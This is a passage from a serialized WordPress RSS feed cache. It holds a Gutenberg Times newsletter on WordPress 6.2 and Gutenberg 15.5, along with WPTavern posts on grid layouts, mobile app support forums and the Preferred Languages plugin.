for the Block editor. </a></li></ul></div>\n</div></div>\n\n\n\n\n<h2 class=\"wp-block-heading\" id=\"0-word-press-release-information\">Developing Gutenberg and WordPress</h2>\n\n\n\n<p>It is finally here!  <a href=\"https://wordpress.org/news/2023/03/dolphy/\"><strong>WordPress 6.2 &#8220;Dolphy&#8221; </strong></a>was released on March 29, 2023. Over 600 contributors made the first major release in 2023 possible. They come from at least 50 countries. With 900+ enhancements, ten full Gutenberg release features, and a slew of performance improvements, you might not be surprised to learn that “Dolphy” reached the impressive milestone of 2 million downloads in under 2 hours after release. After the first week, it reached over 18 million downloads.&nbsp;</p>\n\n\n\n<ul>\n<li>The release post has the details: <a href=\"https://wordpress.org/news/2023/03/dolphy/\"><strong>WordPress 6.2 &#8220;Dolphy&#8221;</strong></a></li>\n\n\n\n<li>The field guide for developers is available since RC 1: <a href=\"https://make.wordpress.org/core/2023/03/09/wordpress-6-2-field-guide/\"><strong>WordPress 6.2 Field Guide</strong></a></li>\n\n\n\n<li>Watch the recorded Product Demo video from the preview event. <a href=\"https://make.wordpress.org/core/2023/03/10/6-2-live-product-demo-qa/\"><strong>6.2 Live Product Demo Q&amp;A</strong></a></li>\n</ul>\n\n\n\n<a href=\"https://wordpress.org/news/2023/03/dolphy/\"><img /></a>\n\n\n\n<p>Here is a highly subjective list of detailed articles on various sites about the release and the features in WordPress 6.2:</p>\n\n\n\n<ul>\n<li><strong>Carlo Daniele</strong> for Kinsta: <a href=\"https://kinsta.com/blog/wordpress-6-2/\">What’s New In WordPress 6.2: Browse Mode, Style Book, Improved Navigation Menus, New APIs, and Much More</a>.</li>\n\n\n\n<li><strong>Leonardus Nugraha</strong> for Hostinger: <a href=\"https://www.hostinger.com/blog/wordpress-6-2\">WordPress 6.2 Is Finally Here: A Detailed Overview</a></li>\n\n\n\n<li><strong>Dan Knauss</strong>, for iThemes&nbsp;<a href=\"https://ithemes.com/blog/what-to-expect-in-wordpress-6-2\"><strong>What to Expect in WordPress 6.2</strong></a> (<em>BTW iThemes just announced a <a href=\"https://solidwp.com/\">total rebranding to SolidWP</a></em>)</li>\n\n\n\n<li>And last but not least: <strong>Sarah Gooding </strong>for WPTavern: <a href=\"https://wptavern.com/wordpress-6-2-dolphy-introduces-a-revamped-site-editor-distraction-free-writing-mode-and-updated-block-inserter\">WordPress 6.2 “Dolphy” Introduces a Revamped Site Editor, Distraction-Free Writing Mode, and Updated Block Inserter&nbsp;</a></li>\n</ul>\n\n\n\n<div class=\"wp-block-group has-light-background-background-color has-background is-layout-flow wp-block-group-is-layout-flow\"><div class=\"wp-block-group__inner-container\">\n<p><strong>🎙️ </strong> New episode:  <a href=\"https://gutenbergtimes.com/podcast/gutenberg-changelog-81-wordpress-6-2-interactivity-api/\">Gutenberg Changelog #81 – WordPress 6.2, Gutenberg 15.4 and 15.5, Phase 3 – Collaboration and a new  Interactivity API</a> with Birgit Pauli-Haack and special guest Leonardus Nugraha</p>\n</div></div>\n\n\n\n<p><strong><a href=\"https://twitter.com/Leonugr\">Leonardus Nugraha</a> </strong>joined me on Friday for Gutenberg Changelog episode 81, and we also talked about WordPress 6.2. We also covered Gutenberg plugin releases 15.4 and 15.5, Phase 3 and the Interactivity API proposal. If you are a subscriber, the episode will drop into your favorite Podcast app over the weekend. </p>\n\n\n\n<img />\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>In the <a href=\"https://gutenbergtimes.com/phase-3-collaboration-layout-and-spacing-controls-block-visibility-3-0-weekend-edition-248/\"><em>Weekend edition #248</em></a>, we shared Matias Ventura&#8217;s announcement on the <a href=\"https://make.wordpress.org/core/2023/03/24/phase-3-collaboration/\">Phase 3: Collaboration</a>  </p>\n\n\n\n<p><strong>Josepha Haden Chomphosy</strong> and <strong>Hector Prieto</strong> discussed a few questions the community had about Phase 3 in the latest episode of the WP Briefing: <a href=\"https://wordpress.org/news/2023/03/episode-52-phase-three-with-hector-prieto/\"><strong>Episode 52: Workflows and Phase Three Visioning with Special Guest Héctor Prieto</strong></a></p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>In his <a href=\"https://make.wordpress.org/design/2023/03/27/design-share-mar-13-mar-24/\"><strong>Design Share: Mar 13–Mar 24</strong></a>, <strong>Joen Asmussen</strong> showcased the latest work by the WordPress Design team. One display is particular interesting as it imagines how the block options menu can scale and house even more options. In another section, Asmussen shows how the team is thinking about the template management. </p>\n\n\n\n<img />\n\n\n\n<p>This week, <strong>Ryan Welcher</strong> and <strong>Justin Tadlock</strong> wrangled the Gutenberg plugins release and published the release post: <strong><a href=\"https://make.wordpress.org/core/2023/04/05/whats-new-in-gutenberg-15-5-05-april/\">What’s new in Gutenberg 15.5? (05 April)</a>. </strong>In it, they highlight </p>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2023/04/05/whats-new-in-gutenberg-15-5-05-april/#patterns-as-template-starters\">Patterns as template starters</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/04/05/whats-new-in-gutenberg-15-5-05-april/#style-captions-via-the-styles-interface\">Style captions via the Styles interface</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/04/05/whats-new-in-gutenberg-15-5-05-april/#experimental-grid-layout-support\">Experimental grid layout support</a></li>\n</ul>\n\n\n\n<p>I am particularly, curious about how the grid layout works. It seems quite complex as the editor needs to deal with several levels and Inner Blocks and how they follow the overall grid layout. It&#8217;s important that theme builders test this and provide feedback, so it can be solidified. </p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"0-p\">Plugins, Themes, and Tools for #nocode site builders and owners</h2>\n\n\n\n<p><strong>Anne McCarthy</strong>, manager of the FSE-Outreach Project hosted a Hallway Hangout with <a href=\"https://twitter.com/bbertucc\"><strong>Blake Bertuccelli-Booth</strong></a> on <a href=\"https://make.wordpress.org/test/2023/04/04/hallway-hangout-lets-chat-about-moving-to-the-site-editor/\">Moving to the Site Editor</a>. Bertucelli-Booth &#8220;sees a huge advantage in using the Site Editor directly as a design tool rather than using Figma before replicating in WordPress.&#8221; and &#8220;Generally speaking, they try not to build that many custom blocks and instead rely on patterns with an emphasis on employing as much as possible from&nbsp;<a href=\"https://developer.wordpress.org/block-editor/how-to-guides/curating-the-editor-experience/\">the curating the editor experience doc</a>.&#8221; McCarthy wrote. It&#8217;s a great conversation to have and one I will revisit, when starting to migrate the Gutenberg Times to a block theme. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Munir Kamal</strong> launched <a href=\"https://gutenberghub.com/launching-gutenberghub-shop/\">GutenbergHub Shop</a> where he offers an extensive range of Gutenberg Blocks, Templates, and Extensions, designed to facilitate and enhance the website building process. Kamal has big plans for the future. I am excited to see <a href=\"https://shop.gutenberghub.com/\">what&#8217;s in store </a>next</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Anders Noren</strong>, an early adopter of block themes, published a new theme in the WordPress repository called <strong><a href=\"https://wordpress.org/themes/abisko/\">Abisko</a>.</strong> &#8220;Abisko is a stylish blog theme with a heavy emphasis on bold typography and generous amounts of whitespace. It comes with 5 different theme styles to choose from, and over 30 different block patterns that you can use to build unique page layouts quickly.&#8221;<br /><br />Sarah Gooding has the skinny for you: <a href=\"https://wptavern.com/anders-noren-releases-abisko-a-new-free-wordpress-theme-with-30-block-patterns\"><strong>Anders Norén Releases Abisko, a New Free WordPress Theme with 30+ Block Patterns</strong></a></p>\n\n\n\n<img /><em>Features pattern. Theme Abiski by Andres Noren. </em>\n\n\n\n<p>WordPress 6.2 comes with an Openverse integration for media and block inserter. <strong>Wes Theron </strong>has a tutorial for you on how to <a href=\"https://learn.wordpress.org/tutorial/add-media-and-openverse-images-to-your-content-directly-from-the-inserter/\"><strong>Add media and Openverse images to your content directly from the Inserter</strong></a></p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"2-word-press-6-0-1-and-6-1-scheduled\">Theme Development for Full Site Editing and Blocks</h2>\n\n\n\n<p><a href=\"https://twitter.com/jkoussertari\"><strong>James Koussertari</strong></a> at GutenbergMarket, published <a href=\"https://gutenbergmarket.com/news/a-comprehensive-guide-to-building-wordpress-block-themes\"><strong>A Comprehensive Guide to Building WordPress Block Themes</strong></a> with links to official and other sources. Apart from the official sources, Carolina Nymark&#8217;s fullsiteediting.com has the most details resources.  </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>Previously, <strong>Felix Arntz</strong> shared his experience of&nbsp;<a href=\"https://felix-arntz.me/blog/rebuilding-my-website-using-a-block-theme/\">rebuilding my WordPress website using a block theme</a>. In his latest blog post he shared how he was <a href=\"https://felix-arntz.me/blog/measuring-website-performance-using-webpagetest-with-wordpress-6-2/\"><strong>measuring website performance using WebPageTest</strong></a>, using the latest WordPress version. Arntz shares his plan, how to select relevant test scenarios and what exactly he wanted to measure. It&#8217;s a great case study, that will help you to also benchmark some of the sites you are dealing with. Felix is super detailed in his post, and you might get lost in the weeds. Make sure you check out the tools he mentions to help with the endeavor. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><b>The WPEngine</b> team has released the Pattern Manager plugin in the WordPress plugins directory . The description reads: &#8220;When you design beautiful block patterns for your theme, Pattern Manager by WP Engine will automatically push them into PHP files for you, every time you save.&#8221; </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n\n<p><strong>&nbsp;<a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/\" target=\"_blank\" rel=\"noreferrer noopener\">&#8220;Keeping up with Gutenberg &#8211; Index 2022&#8221;</a>&nbsp;</strong><br />A chronological list of the WordPress Make Blog posts from various teams involved in Gutenberg development: Design, Theme Review Team, Core Editor, Core JS, Core CSS, Test, and Meta team from Jan. 2021 on. Updated by yours truly.  <a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/keeping-up-with-gutenberg-index-2020/\"><em>The index 2020 is here</em></a></p>\n\n\n\n\n<p><strong><a href=\"https://twitter.com/benjaminritner\">Ben Ritner</a></strong> elaborated on the <a href=\"https://www.kadencewp.com/blog/wordpress-6-2-and-the-state-of-fse/\"><strong>state of FSE themes,</strong></a> “…there is a lot about the site editor and FSE themes that are not quite ready…”. Ritner and his team at Kadence theme were early adopters of the Block editor and built a very popular Block Collection plugin. Together with the Kadence Theme, the plugin elevated the user experience to page building capabilities with features the block editor was missing for a long time. There are still things Ritner finds missing. Read  the article and see if his gaps are also relevant to your theme building journey. </p>\n\n\n\n<p></p>\n\n\n\n<p><a href=\"https://twitter.com/nschaeferhoff\">Nick Schäferhoff</a> found <a href=\"https://torquemag.io/2023/03/wordpress-site-editor-features/\"><strong>10 WordPress Site Editor (FSE) Features You Didn’t Know About</strong></a>, even if you know about some of them, you might not know all of them. </p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"3-building-themes-for-fse-and-word-press\">Building Blocks and Tools for the Block editor. </h2>\n\n\n\n<p>In his post,<strong> <a href=\"https://developer.wordpress.org/news/2023/03/quick-and-easy-local-wordpress-development-with-wp-env/\">Quick and easy local WordPress development with wp-env</a>, Michael Burridge</strong> introduced you to the WordPress development tool that comes with the Gutenberg plugin and allows you to quickly spin up a WordPress site on your computer to start working on proof of concepts, or follow an interesting idea. <em>(Docker required </em></p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Jonathan Bossenger</strong>&#8216;s new course is online on Learn.WordPress site.  <a href=\"https://learn.wordpress.org/course/converting-a-shortcode-to-a-block/\"><strong>Converting a Shortcode to a Block</strong></a>. This is a newer style of course, where we&#8217;re using existing tutorial content, updating it with images, code examples and quizzes, and bundling it as a short course.  A short version of the course is available as a tutorial on the WordPress Developer Blog: <a href=\"https://developer.wordpress.org/news/2023/03/converting-your-shortcodes-to-blocks/\"><strong>Converting your shortcodes to blocks</strong></a></p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Michael Burridge</strong> and <strong>Jonathan Bossenger</strong> held live Developer Hours for the Asia/Pacific timezones and uploaded the recording to WordPressTV: <a href=\"https://wordpress.tv/2023/04/03/developer-hours-migrate-a-plugin-to-blocks-emea-asia-pacific/\"><strong>Developer Hours: Migrate a plugin to blocks (EMEA / Asia-Pacific)</strong></a></p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Ryan Welcher</strong>  invited developers to bring block development issues to the live stream on Twitch. Some recordings are available on YouTube:  <a href=\"https://www.youtube.com/watch?v=Aut0EcsKbxM&t=3s\"><strong>Block Development: Bring me your issues!</strong></a> In this edition, Welcher covers about 14 different issues submitted by viewers. </p>\n\n\n\n<p>Among those: </p>\n\n\n\n<ul>\n<li>Adding some checks to only show the link to users with the correct level of access.</li>\n\n\n\n<li>Creating a post-placeholder block and creating the parent/child relationship with the post-picker block.</li>\n\n\n\n<li>Updating the Edit component to match the output of the front end.</li>\n</ul>\n\n\n\n<p><a href=\"https://www.twitch.tv/ryanwelchercodes\">Ryan Welcher streams very Thursday at 10:30 ET / 15:30 UTC on Twitch </a></p>\n\n\n\n<p></p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong><a href=\"https://twitter.com/santosguillamot\">Mario Santos</a></strong> posted on the Make Core blog the <a href=\"https://make.wordpress.org/core/2023/03/30/proposal-the-interactivity-api-a-better-developer-experience-in-building-interactive-blocks/\"><strong>Proposal: The Interactivity API – A better developer experience in building interactive blocks</strong></a>.  The vision:  &#8220;Imagine plugins providing interactions like “heart this post” or “add to cart” without page reloads. Picture instant search, commenting, and native full-page transitions as best-in-class built-ins without complex scaffolding or external tools. Envision achieving this in any block theme by default without sacrificing&nbsp;PHP&nbsp;server rendering and the&nbsp;plugin&nbsp;ecosystem for a&nbsp;JS&nbsp;runtime. Visualize block developers easily declaring and extending such behaviors in a way that is immediately familiar and compatible with the block ecosystem.&#8221; </p>\n\n\n\n<p>Santos also shared a short demo of  Favorites in a Movies app. You can <a href=\"https://wpmovies.dev/\">browse it yourself on the live site</a>, and if you are interested in the implementation, the <a href=\"https://github.com/wordpress/wp-movies-demo\">demo code is also available on GitHub</a>. This post definitely has a high Geek-factor, but the aim is to make it easier for any developer to create interactive blocks. Stay tuned for more examples and examples code.</p>\n\n\n\n<p>Two developers from the team working on the Interactivity API will be speakers at the <strong>Developer Hours on April 17,</strong> and give an<a href=\"https://www.meetup.com/learn-wordpress-online-workshops/events/292575913/\"> </a><strong><a href=\"https://www.meetup.com/learn-wordpress-online-workshops/events/292575913/\">Introduction of the </a>Interactivity API</strong>. They will hold two events  to accommodate as many times zones as possible: <a href=\"https://www.meetup.com/learn-wordpress-online-workshops/events/292575913/\">at 8am UTC</a> with Mario Santos and <a href=\"https://www.meetup.com/learn-wordpress-online-workshops/events/292575942/\"><strong>at 17:00 UTC</strong></a> with Michal Czamplinski</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n\n<p><strong><a href=\"https://gutenbergtimes.com/need-a-zip-from-master/\">Need a plugin .zip from Gutenberg&#8217;s master branch?</a></strong><br />Gutenberg Times provides daily build for testing and review. <br />Have you been using it? Hit reply and let me know.</p>\n\n\n\n<p><img alt=\"GitHub all releases\" src=\"https://img.shields.io/github/downloads/bph/gutenberg/total?style=for-the-badge\" /></p>\n\n\n\n\n<p class=\"has-text-align-right has-small-font-size\"><em>Questions? Suggestions? Ideas? Don&#8217;t hesitate to send <a href=\"mailto:pauli@gutenbergtimes.com\">them via email</a> or send me a message on WordPress Slack or Twitter @bph</em>. </p>\n\n\n\n<p class=\"has-text-align-right has-small-font-size\">For questions to be answered on the <a href=\"http://gutenbergtimes.com/podcast\">Gutenberg Changelog</a>, send them to <a href=\"mailto:changelog@gutenbergtimes.com\">changelog@gutenbergtimes.com</a></p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n\n<p>Featured Image: Munich, view from the tower of St. Paul by Birgit Pauli-Haack, found on wordpress.org/photos. </p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity is-style-wide\" />\n\n\n\n<p class=\"has-text-align-left\"><strong>Don&#8217;t want to miss the next Weekend Edition? </strong></p>\n\n\n\n<form class=\"wp-block-newsletterglue-form ngl-form ngl-portrait\" action=\"https://gutenbergtimes.com/feed/\" method=\"post\"><div class=\"ngl-form-container\"><div class=\"ngl-form-field\"><label class=\"ngl-form-label\" for=\"ngl_email\"><br />Type in your Email address to subscribe.</label><div class=\"ngl-form-input\"><input type=\"email\" class=\"ngl-form-input-text\" name=\"ngl_email\" id=\"ngl_email\" /></div></div><button type=\"submit\" class=\"ngl-form-button\">Subscribe</button><p class=\"ngl-form-text\">We hate spam, too and won&#8217;t give your email address to anyone except Mailchimp to send out our Weekend Edition</p></div><div class=\"ngl-message-overlay\"><div class=\"ngl-message-svg-wrap\"></div><div class=\"ngl-message-overlay-text\">Thanks for subscribing.</div></div><input type=\"hidden\" name=\"ngl_list_id\" id=\"ngl_list_id\" value=\"26f81bd8ae\" /><input type=\"hidden\" name=\"ngl_double_optin\" id=\"ngl_double_optin\" value=\"yes\" /></form>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity is-style-wide\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 08 Apr 2023 07:09:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Birgit Pauli-Haack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:25;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"WPTavern: Gutenberg 15.5 Introduces Experimental Grid Layout Support\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=143396\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"https://wptavern.com/gutenberg-15-5-introduces-experimental-grid-layout-support\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3586:\"<p><a href=\"https://make.wordpress.org/core/2023/04/05/whats-new-in-gutenberg-15-5-05-april/\">Gutenberg 15.5</a> was released this week with more new features and refinements to WordPress&#8217; full-site editing capabilities. The project will soon be moving on to Phase 3 with <a href=\"https://wptavern.com/real-time-collaboration-is-coming-to-wordpress\">real-time collaboration</a> on the roadmap, but there are still many improvements on the way for the Site Editor and core blocks.</p>\n\n\n\n<p>This release introduces experimental support for grid layouts in the Group block. Gutenberg contributors are testing a Grid layout type as a new variation for the Group block. They decided on this implementation instead of a new block in order to get more real-world use on the first iteration. </p>\n\n\n\n<img />\n\n\n\n<p>After testing, I found the Grid layout type fits as a natural addition to other Group variations. This first iteration ships with one setting for configuring the minimum column width, but more options can be added in the future. I found it to be far easier to manipulate than the Columns block for basic grids. It may be easier for users to discover and understand if it were implemented as a new block, with the grouping implicit instead of having to add a Group block first and then select a layout.</p>\n\n\n\n\n\n\n\n<p>Grid layouts are a common feature of page builder plugins and this new capability is necessary to make Gutenberg&#8217;s page building capabilities more robust. With more testing, contributors can settle on an implementation and build it out from there. If you want to give it a try, the Grid variation for the Group block can be enabled under <strong>Gutenberg > Experiments</strong>.</p>\n\n\n\n<img />\n\n\n\n<p>Gutenberg 5.5 also introduces the ability for theme authors to identify a custom pattern to be displayed when users load a specific template, such as a 404 page, author page, or single post, instead of relying on a fallback template or starting from a blank slate. This makes it possible to have <a href=\"https://make.wordpress.org/core/2023/04/05/whats-new-in-gutenberg-15-5-05-april/\">custom patterns as template starters</a>, a friendlier jumping off point for users who are editing their sites.</p>\n\n\n\n<p>The update brings the ability for users to <a href=\"https://github.com/WordPress/gutenberg/pull/49141\">style their Captions in the Styles interface</a>. Captions&#8217; color, typography, and size can now be easily edited with changes applied globally.</p>\n\n\n\n<img />image credit: <a href=\"https://make.wordpress.org/core/2023/04/05/whats-new-in-gutenberg-15-5-05-april/\">Gutenberg 5.5 release post</a>\n\n\n\n<p>A few other important updates in this release include the following: </p>\n\n\n\n<ul>\n<li>New <a href=\"https://github.com/WordPress/gutenberg/pull/49111\">Post Modified Date variation</a> for the Post Date block lets users display the post&#8217;s most recent date updated</li>\n\n\n\n<li>Sticky Position: New “Make sticky” action added to the Template Part block</li>\n\n\n\n<li>Buttons: Disabled support for &#8220;edit as HTML&#8221; in block options</li>\n\n\n\n<li> Time to Read block adds spacing and typography support</li>\n\n\n\n<li>Columns block adds support for template locking</li>\n\n\n\n<li>“Image size” replaced with “Resolution” in image size controls</li>\n</ul>\n\n\n\n<p>Check out the changelog in the <a href=\"https://make.wordpress.org/core/2023/04/05/whats-new-in-gutenberg-15-5-05-april/\">release post</a> for a full list of all the bug fixes, enhancements, and performance, documentation, and code quality improvements.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 07 Apr 2023 15:54:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:26;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"WPTavern: WordPress Mobile Apps Get a New Support Forum\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=143415\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"https://wptavern.com/wordpress-mobile-apps-get-a-new-support-forum\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1939:\"<p>Support for the WordPress mobile apps is <a href=\"https://make.wordpress.org/mobile/2023/03/28/new-mobile-support-forum/\">moving to the WordPress.org forums</a>. Previously, users were routed to WordPress.com, even those who were self-hosted, and Automattic employees handled support tickets related to the mobile apps. </p>\n\n\n\n<p>This move to WordPress.org is part of an effort to disentangle the official WordPress mobile apps from Automattic&#8217;s services. In July 2022, the Mobile Team announced it will be <a href=\"https://wptavern.com/automattic-is-removing-wordpress-com-features-from-the-official-wordpress-mobile-apps\">pulling all the Jetpack and WordPress.com features from the official WordPress mobile apps</a> and moving them into the Jetpack app.</p>\n\n\n\n<p>Although the mobile apps previously had forums on an older bbPress installation, they were rarely used as those in need of helped were piped through the WordPress.com support queue. The new <a href=\"https://wordpress.org/support/forum/mobile/\">mobile support forum</a> is listed on the Support page and is already active with requests regarding <a href=\"https://wordpress.org/support/topic/wordpress-app-crash-samsung-galaxy-tablet/\">app crashes</a>, <a href=\"https://wordpress.org/support/topic/cannot-connect-to-site-with-mobile-wp-app-403-error-xmlrpc-endpoint/\">XML-RPC errors</a>, and <a href=\"https://wordpress.org/support/topic/gallery-block-glitch/\">issues with core blocks</a>.</p>\n\n\n\n<p>Bringing mobile support to a public place has the advantage of allowing users to help each other, search through old threads, and look for answers in the same way they do for problems with themes or plugins. It standardizes the support experience so users know what to expect. The Meta trac <a href=\"https://meta.trac.wordpress.org/ticket/6686\">ticket</a> for the forum creation has been closed now that the initiative is complete and the forum is operational.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 07 Apr 2023 05:10:39 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:27;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"WPTavern: Preferred Languages Feature Plugin Needs Testing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=143376\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://wptavern.com/preferred-languages-feature-plugin-needs-testing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2925:\"<p>The Preferred Languages project is gaining some momentum with this week&#8217;s <a href=\"https://make.wordpress.org/core/2023/04/03/preferred-languages-help-test-the-latest-version/\">2.0 release</a> of the feature plugin. In 2017, WordPress Core Committer Pascal Birchler <a href=\"https://make.wordpress.org/core/2017/05/20/preferred-languages-the-prototype/\">released a prototype</a> that lets users select multiple preferred languages in their settings so that WordPress will load the first translation available, falling back to the next language in the list. </p>\n\n\n\n<p>&#8220;<a href=\"https://wordpress.org/about/stats/#locales\">More than half of all WordPress sites</a> in the world use a language other than US English,&#8221; Birchler said in a previous update. &#8220;For these sites and users, the options to change the site <em>and</em> user language are great. But when there’s no translation for a given plugin or theme, WordPress falls back to US English. That’s a poor user experience for many non-English speakers.&#8221;</p>\n\n\n\n<p>Version 2.0 introduces some major changes with a full refactoring of the UI to use React. (Previously it was using jQuery and jQuery UI.) Birchler removed the drag and drop sorting functionality to improve accessibility but users should find that almost everything the plugin still looks the same as before.  </p>\n\n\n\n<p>This update also brings compaibility with with <code>WP_Textdomain_Registry</code> and <code>switch_to_user_locale()</code> for users on WordPress 6.1+ and brings unit test coverage to nearly 100%. </p>\n\n\n\n<p>The <a href=\"https://wordpress.org/plugins/preferred-languages/\">Preferred Languages plugin</a> has more than 2,000 active installs but Birchler is calling for people to test the update, as he believes the plugin is close to a core merge proposal.</p>\n\n\n\n<p>&#8220;One big remaining question mark is the concept of <em>translation merging</em>,&#8221; he said. &#8220;By default, if there are only some missing strings in a selected locale, these would be displayed in English. But with translation merging, the missing strings will be taken from the locale next in line instead. While this works great, it could be <a href=\"https://github.com/swissspidy/preferred-languages/issues/536\">a tad slow</a> due to the way translations are loaded in WordPress. Any help addressing this potential performance concern would be greatly appreciated.&#8221;</p>\n\n\n\n<p>Testers can <a href=\"https://github.com/swissspidy/preferred-languages\">contribute to the code on GitHub</a>, leave feedback on the <a 